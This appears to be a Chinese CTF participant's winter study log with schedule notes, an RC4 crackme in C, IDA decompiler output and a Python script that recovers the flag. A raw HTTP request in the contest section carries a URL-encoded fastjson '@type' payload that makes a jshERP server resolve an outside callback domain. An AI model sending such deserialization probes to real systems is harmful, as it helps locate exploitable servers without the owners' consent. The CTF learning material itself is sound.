![cover](http://img.cdn.guozk.cn/usr/uploads/2023/2024%208%2017/20240817-181312.jpg)
寒假学习记录
#逆向RC4
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// ULONG: shorthand for unsigned long; main() uses it for the ciphertext length.
// unsigned long is 32 bits wide on Windows (LLP64) and 64 bits on LP64 Unix targets.
typedef unsigned long ULONG;
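/*
 * RC4 key-scheduling step (KSA): fill the 256-byte state s with 0..255 and
 * permute it under the key.
 *
 * s    - caller-provided state array of at least 256 bytes (written)
 * key  - key bytes (read only)
 * Len  - number of key bytes; must be at least 1
 *
 * If s or key is NULL, or Len is 0, the function returns without touching s.
 * The earlier version evaluated i % Len unconditionally, which divides by
 * zero for an empty key.
 *
 * RC4 appears here because the exercise is about recognising it in a binary.
 * Its keystream has known statistical biases, so it is not a choice for
 * protecting real data.
 */
void init(unsigned char *s, unsigned char *key, unsigned long Len)
{
    /*
     * The expanded key must be unsigned: with a plain (signed) char, key
     * bytes >= 0x80 become negative, j can go below zero, and s[j] then
     * indexes outside the 256-byte state.
     */
    unsigned char k[256] = {0};
    unsigned int j = 0;

    if (s == NULL || key == NULL || Len == 0) {
        return;
    }

    /* Identity permutation, and the key repeated to fill 256 bytes. */
    for (unsigned int i = 0; i < 256; i++) {
        s[i] = (unsigned char)i;
        k[i] = key[i % Len];
    }

    /* Mix the state: every position is swapped with a key-dependent one. */
    for (unsigned int i = 0; i < 256; i++) {
        j = (j + s[i] + k[i]) % 256;

        unsigned char tmp = s[i];
        s[i] = s[j]; /* swap s[i] and s[j] */
        s[j] = tmp;
    }
}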
/*
 * RC4 keystream step (PRGA): XOR Len bytes of Data in place with the
 * keystream produced from the state s. Because the operation is an XOR,
 * the same call both encrypts and decrypts.
 *
 * s    - 256-byte state prepared by init(); it is modified as bytes are produced
 * Data - buffer of at least Len bytes, transformed in place
 * Len  - number of bytes to process
 *
 * NOTE(review): the name collides with POSIX crypt() if <unistd.h> or
 * <crypt.h> is ever included in this file.
 */
void crypt(unsigned char *s, unsigned char *Data, unsigned long Len)
{
    int x = 0;
    int y = 0;
    unsigned long pos = 0;

    while (pos < Len) {
        /* x and y never go negative, so masking equals the modulo by 256. */
        x = (x + 1) & 0xFF;
        y = (y + s[x]) & 0xFF;

        /* swap s[x] and s[y] */
        unsigned char held = s[x];
        s[x] = s[y];
        s[y] = held;

        /* The keystream byte sits at the position given by the two swapped values. */
        Data[pos] ^= s[(s[x] + s[y]) & 0xFF];
        pos++;
    }
}
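/*
 * Crackme entry point: read one line from stdin, decrypt the embedded RC4
 * ciphertext with the embedded key, and print "Good!" when the line equals
 * the decrypted text, "ERROR!" otherwise.
 *
 * Both the key and the ciphertext live in the binary, so the expected input
 * can be recovered by anyone who reads them out; that is the point of the
 * reversing exercise.
 *
 * Returns 0 in every case.
 */
int main(void)
{
    /* Number of ciphertext bytes initialised in pData below. */
    enum { CIPHER_LEN = 22 };

    int c;        /* int, not char, so EOF can be told apart from data */
    size_t a = 0; /* next free position in input */
    unsigned char s[256] = {0}; /* S-box */
    char key[256] = {"12345678"};
    char pData[512] = {-17,-64,87,-117,125,-39,-18,-46,-59,114,100,-85,-7,8,105,-63,45,-22,-12,36,-84,27};
    char input[512] = {0};
    /*
     * Explicit length instead of strlen(pData): strlen on ciphertext stops
     * at the first 0x00 byte and only worked here because none occurs.
     */
    ULONG len = CIPHER_LEN;

    printf("please input your flag:\n");

    /*
     * Read up to the newline or end of input. Characters beyond the buffer
     * are read and dropped, so a long line cannot write past input[] and a
     * closed stdin cannot loop forever. The last byte stays 0 as terminator.
     */
    while ((c = getchar()) != EOF && c != '\n') {
        if (a < sizeof input - 1) {
            input[a++] = (char)c;
        }
    }

    init(s, (unsigned char *)key, strlen(key)); /* state is now initialised */
    crypt(s, (unsigned char *)pData, len);      /* XOR turns the ciphertext back into plaintext */

    /* pData is 512 bytes and zero beyond CIPHER_LEN, so it is NUL-terminated. */
    if (!strcmp(input, pData))
        printf("Good!");
    else
        printf("ERROR!");
    return 0;
}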
原文
时间进度
1月20日—1月28日
制定学习计划
C语言 · 启航
施行学习计划
设置学习打卡机制
22日晚观看赛前说明会
靶场试炼
安排任务
题目讲解
开发飞书机器人实现自动递交flag验证
RE手
逆向、汇编学习进展
PWN手
Pwn、Linux学习进展
召开一周总结
漏洞挖掘
发掘安卓底层漏洞,上报MISRC并获得致歉。
战队声望
在CTF知名网站获悉,GZYSEC排名
赛事状况
期间参加獬豸杯,据悉此次电子取证大赛由江西警察学院科技与信息安全系火炬木攻防实验室等单位主办
受长亭科技邀请参与 Real World CTF 6(th) 体验赛
EvilMQ
漏洞原理类似 ActiveMQ, 但是是 Client 端 RCE, 需要自己构造一个 Evil Server
https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
几个关键点
https://github.com/apache/inlong/blob/9d745b8449b8f57573668d7c332a71179027be20/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/netty/NettyClient.java#L349
https://github.com/apache/inlong/blob/master/inlong-tubemq/tubemq-core/src/main/java/org/apache/inlong/tubemq/corerpc/utils/MixUtils.java#L70
1月29日—2月4日
复现
搭建赛事复现环境
笔记
参与编写逆向笔记
Hgame
29日参与Hgame
西湖
30日参加西湖论剑大赛
RE
web
GET /jshERP-boot/user/list?search=%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%73%61%74%76%65%72%70%76%79%6e%2e%64%67%72%68%33%2e%63%6e%22%7d&column=createTime&order=desc&field=id,,,action,loginName,username,userType,roleName,orgAbr,leaderFlagStr,phonenum,userBlngOrgaDsplSeq,status&currentPage=1&pageSize=10 HTTP/1.1
Host: 1.14.108.193:31882
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Access-Token: ea4b6df790ab427d9564d16cf7fee026_0
Connection: close
Referer: http://1.14.108.193:31882/system/user
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583502; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706583724
测试赛
自建靶机:Web测试
2024.0xctf.org.cn
2月05日—2月11日
总结
自主学习总结
逆向手
「本周做的哪些事情【简要总结】
web基础的了解,汇编的了解,内存占用,C语言前八道二级设计题以及文件的打开,高级进阶函数、树的结构和堆栈,高数前七章节的复习,西湖赛事题目的了解以及复盘(虽然说现在还没怎么懂)。
PWN手
密码手
除夕红包赛
2月9日红包赛
代码能力测试
2月10日代码能力测试
2月12日—2月18日
铁人三项环境复现
2月15日根据铁人三项杯搭建环境复现
逆向
放入ida,发现众多函数,查找字符串定位函数。
// Decompiler (IDA) output for the flag check. The enclosing function header and
// the declarations of v1..v32 and i are not part of this excerpt.
// v26 is the write position in the input buffer v27.
v26 = 0;
// v4..v25 are 22 separately named locals. The comparison loop below reads them
// as *(&v4 + i), i.e. as one array of indices into byte_415768.
v4 = 1;
v5 = 4;
v6 = 14;
v7 = 10;
v8 = 5;
v9 = 36;
v10 = 23;
v11 = 42;
v12 = 13;
v13 = 19;
v14 = 28;
v15 = 13;
v16 = 27;
v17 = 39;
v18 = 48;
v19 = 41;
v20 = 42;
v21 = 26;
v22 = 20;
v23 = 59;
v24 = 4;
v25 = 0;
printf("please enter flag:");
// sub_411136() follows every library call in this listing; presumably a
// compiler-inserted runtime check stub rather than program logic -- confirm in IDA.
sub_411136();
// Character-by-character input loop with manual echo.
while ( 1 )
{
getch();
// NOTE(review): the decompiler attributes the value to sub_411136(); presumably
// it is getch()'s return value passed through -- confirm.
v1 = sub_411136();
v27[v26] = v1;
// Stop on a zero value or on 13 (carriage return).
if ( !v1 || v27[v26] == 13 )
break;
// 8 is backspace: move the cursor back and step the write position back.
// NOTE(review): no check is visible that v26 stays at or above zero, so
// repeated backspaces would move the index below the start of v27.
if ( v27[v26] == 8 )
{
printf("\b\b");
sub_411136();
--v26;
}
else
{
// Any other character is echoed and kept.
// NOTE(review): no upper bound on v26 is visible in this excerpt, and the
// size of v27 is not shown.
printf("%c", v27[v26]);
sub_411136();
++v26;
}
}
// v3 is set to 1 on any mismatch below; how it is used afterwards is outside this excerpt.
v3 = 0;
// Only the first 17 of the index values are used.
for ( i = 0; i < 17; ++i )
{
if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
v3 = 1;
}
// v28..v32 are compared with the fixed tail "1024}"; presumably they are the
// bytes that follow the 17 checked characters of v27 -- confirm against the stack layout.
if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
v3 = 1;
// Terminate the collected input at the final write position.
v27[v26] = 0;
// From the second statement on the next line the same listing is pasted a second time.
printf("\r\n");v26 = 0;
// Second copy: the same 22 index values as in the first copy.
v4 = 1;
v5 = 4;
v6 = 14;
v7 = 10;
v8 = 5;
v9 = 36;
v10 = 23;
v11 = 42;
v12 = 13;
v13 = 19;
v14 = 28;
v15 = 13;
v16 = 27;
v17 = 39;
v18 = 48;
v19 = 41;
v20 = 42;
v21 = 26;
v22 = 20;
v23 = 59;
v24 = 4;
v25 = 0;
printf("please enter flag:");
sub_411136();
// Same input loop as in the first copy: 0 or 13 ends input, 8 steps back, anything else is echoed and stored.
while ( 1 )
{
getch();
v1 = sub_411136();
v27[v26] = v1;
if ( !v1 || v27[v26] == 13 )
break;
if ( v27[v26] == 8 )
{
// NOTE(review): as in the first copy, v26 is decremented with no visible lower bound.
printf("\b\b");
sub_411136();
--v26;
}
else
{
// NOTE(review): as in the first copy, v26 is incremented with no visible upper bound.
printf("%c", v27[v26]);
sub_411136();
++v26;
}
}
v3 = 0;
// 17 table-driven comparisons, then the fixed tail "1024}".
for ( i = 0; i < 17; ++i )
{
if ( v27[i] != byte_415768[*(&v4 + i)] )//KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138
v3 = 1;
}
if ( v28 != '1' || v29 != '0' || v30 != '2' || v31 != '4' || v32 != '}' )
v3 = 1;
v27[v26] = 0;
printf("\r\n");
程序以数组v4中的数字为下标,从字符串中逐个取出字符与v27比较,如果全部相等,则success。
v4数组即最上方连续的一串整型变量(1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42,26,20,59),循环只用到其中前17个;
相应的字符串为KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138;
v27之后的最后几位(v28到v32)单独比较,也就是1024}。
根据以上过程编写脚本。
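# Rebuild the part of the flag that the binary checks through its index table.
# The pasted script had lost the indentation of the loop body and did not parse.

# Character table as quoted in the decompiled listing.
st = 'KfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
# Index values taken from the locals v4.. in the decompiled listing.
index = (1, 4, 14, 10, 5, 36, 23, 42, 13, 19, 28, 13, 27, 39, 48, 41, 42, 26, 20, 59)

flag = ''
# The binary's loop runs for i < 17, so only the first 17 indices are used.
# NOTE(review): the lookup is 1-based here (index - 1) while the decompiled code
# indexes byte_415768 directly; presumably the quoted string starts one byte
# after byte_415768 -- confirm in IDA.
for n in range(0, 17):
    flag = flag + st[index[n] - 1:index[n]]

# Prints the 17 table-driven characters; the binary checks the tail "1024}" separately.
print(flag)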
flag:KEY{e2s6ry3r5s8f61024}
研究C Sharp逆向工程
VNCTF
2月17日参加VNCTF
2月19日—2月25日
总结
我自从西湖比完之后一直在准备专升本的英语备考,从新概念一开始学起,每天背单词、记笔记、听听力、默写单词和句子、回译文章,偶尔也会打打一些热身赛CTF水水,最近还给他们安排了一下目标。
目前的学习计划